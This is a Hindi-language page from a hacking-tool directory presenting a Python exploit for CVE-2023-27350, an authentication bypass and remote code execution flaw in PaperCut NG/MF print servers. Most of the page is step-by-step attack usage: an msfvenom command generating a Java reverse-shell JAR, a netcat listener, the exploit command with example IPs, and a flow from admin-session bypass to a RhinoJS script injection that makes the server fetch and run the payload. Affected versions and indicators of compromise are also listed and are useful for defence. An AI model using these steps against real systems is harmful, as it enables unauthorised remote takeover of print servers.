Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PaperCut-Authentication_Bypass_and_RCE — यह एक्सप्लॉइट CVE-2023-27350 पर आधारित है और इसे horizon3ai और Metasploit मॉड्यूल के मूल एक्सप्लॉइट के ऊपर बनाया गया है। | Kitploit
उपकरण/GitHubGitHub/joaoaugustom/papercut-authentication_bypass_and_rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षारिमोट एक्सेस टूल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
GitHub
joaoaugustom/papercut-authentication_bypass_and_rce

PaperCut-Authentication_Bypass_and_RCE

यह एक्सप्लॉइट CVE-2023-27350 पर आधारित है और इसे horizon3ai और Metasploit मॉड्यूल के मूल एक्सप्लॉइट के ऊपर बनाया गया है।

रिपॉजिटरी देखें
23 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2023-27350 — PaperCut NG/MF प्रमाणीकरण बाइपास और RCE

PaperCut NG/MF में क्रिटिकल प्रमाणीकरण बाइपास और रिमोट कोड एक्सीक्यूशन भेद्यता के लिए स्टैंडअलोन Python एक्सप्लॉइट। CVSS 9.8।

विवरण

CVE-2023-27350, PaperCut NG और MF के 20.1.7, 21.2.11, और 22.0.9 से पहले के संस्करणों को प्रभावित करता है। यह दोष एक अप्रमाणित हमलावर को /app?service=page/SetupCompleted एंडपॉइंट तक पहुँचने की अनुमति देता है — एक सेटअप पेज जो केवल प्रारंभिक इंस्टॉलेशन के दौरान पहुँच योग्य होना चाहिए — और बिना किसी क्रेडेंशियल के एक वैध प्रशासनिक सत्र प्राप्त करता है।

एडमिन एक्सेस के साथ, हमलावर PaperCut के प्रिंट स्क्रिप्टिंग तंत्र को सक्षम कर सकता है और सर्वर के JVM द्वारा निष्पादित मनमाना कोड इंजेक्ट कर सकता है, जिसके परिणामस्वरूप सेवा उपयोगकर्ता के संदर्भ में पूर्ण RCE होता है।

प्रभावित संस्करण

शाखाफिक्स किया गया संस्करण
20.x20.1.7
21.x21.2.11
22.x22.0.9

संस्करण 18.x और उससे पहले के संस्करणों को कोई आधिकारिक पैच नहीं मिला।

संदर्भ कार्यान्वयन

यह एक्सप्लॉइट दो सार्वजनिक कार्यान्वयनों के विश्लेषण से विकसित किया गया था:

1. horizon3ai/CVE-2023-27350 (Python)

  • रिपॉजिटरी: https://github.com/horizon3ai/CVE-2023-27350
  • दृष्टिकोण: कमांड चलाने के लिए Runtime.exec() का उपयोग एक सादे स्ट्रिंग के साथ करता है
  • सीमाएँ: Runtime.exec(String) शेल मेटाकैरेक्टर (>&, |, 0>&1) को प्रोसेस नहीं करता है, जिससे रिवर्स शेल पेलोड अप्रभावी हो जाते हैं। स्क्रिप्ट प्रिंटर ID (l1001) को हार्डकोड करती है और केवल अंग्रेजी सफलता स्ट्रिंग्स की जाँच करती है, जो गैर-अंग्रेजी इंस्टेंस पर विफल होती है
  • गलत इंजन धारणा: PaperCut द्वारा RhinoJS (BeanShell नहीं) के उपयोग का ध्यान नहीं रखता है, जो कुछ Java पेलोड में सिंटैक्स त्रुटियों का कारण बनता है

2. rapid7/metasploit-framework — PaperCutNG प्रमाणीकरण बाइपास

  • मॉड्यूल: exploit/multi/http/papercut_ng_rce
  • दृष्टिकोण: URLClassLoader के माध्यम से JVM में एक Metasploit JAR लोड करता है, किसी भी शेल निर्भरता से बचता है
  • सीमाएँ: पूर्ण Metasploit Framework की आवश्यकता होती है और एक Java/Meterpreter पेलोड उत्पन्न करता है; nc के साथ स्टैंडअलोन उपयोग के लिए आसानी से अनुकूलित नहीं किया जा सकता

आवश्यकताएँ

root@kitploit:~
Python 3.x
requests
msfvenom (part of Metasploit Framework)
nc (netcat)
root@kitploit:~
pip install requests

उपयोग

1. JAR पेलोड जनरेट करें

root@kitploit:~
msfvenom -p java/shell_reverse_tcp \
  LHOST=<YOUR_IP> LPORT=<SHELL_PORT> \
  -f jar -o payload.jar

2. एक लिसनर शुरू करें

root@kitploit:~
nc -lvnp <SHELL_PORT>

3. एक्सप्लॉइट चलाएँ

root@kitploit:~
python exploit.py \
  -u http://<TARGET>:9191 \
  -j payload.jar \
  -lh <YOUR_IP> \
  -lp <HTTP_PORT> \
  -rp <SHELL_PORT>

उदाहरण:

root@kitploit:~
python exploit.py \
  -u http://192.168.1.100:9191 \
  -j payload.jar \
  -lh 192.168.1.10 \
  -lp 9090 \
  -rp 4444

पैरामीटर

पैरामीटरविवरणडिफ़ॉल्ट
-u / --urlPaperCut आधार URLrequired
-j / --jarpayload.jar का पथrequired
-lh / --lhostआपका IP (लक्ष्य यहाँ वापस कनेक्ट होगा)required
-lp / --lportJAR सर्व करने के लिए HTTP पोर्ट9090
-rp / --rportरिवर्स शेल पोर्ट4444

यह कैसे काम करता है

root@kitploit:~
1. Auth bypass via /app?service=page/SetupCompleted
        ↓
2. Obtain admin JSESSIONID without credentials
        ↓
3. Select [Template Printer] (l1001)
        ↓
4. Inject RhinoJS script into the print script field
        ↓
5. Script creates a URLClassLoader pointing to our HTTP server
        ↓
6. PaperCut JVM downloads and executes payload.jar
        ↓
7. Reverse shell

समझौता संकेतक (IoC)

  • बिना पिछले सत्र के /app?service=page/SetupCompleted तक पहुँच
  • print-and-device.script.enabled और print.script.sandboxed सेटिंग्स का संशोधन (संस्करण >= 19)
  • PaperCut सर्वर से बाहरी IP के लिए आउटबाउंड HTTP कनेक्शन
  • JVM लॉग में बाहरी URL के साथ URLClassLoader इंस्टेंटिएशन

कानूनी अस्वीकरण

यह एक्सप्लॉइट केवल शैक्षिक उद्देश्यों और अधिकृत उपयोग (पेनिट्रेशन टेस्टिंग, CTF, प्रयोगशाला वातावरण) के लिए प्रदान किया गया है। स्पष्ट अनुमति के बिना सिस्टम के खिलाफ अनधिकृत उपयोग अवैध है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।

टूल डाउनलोड करें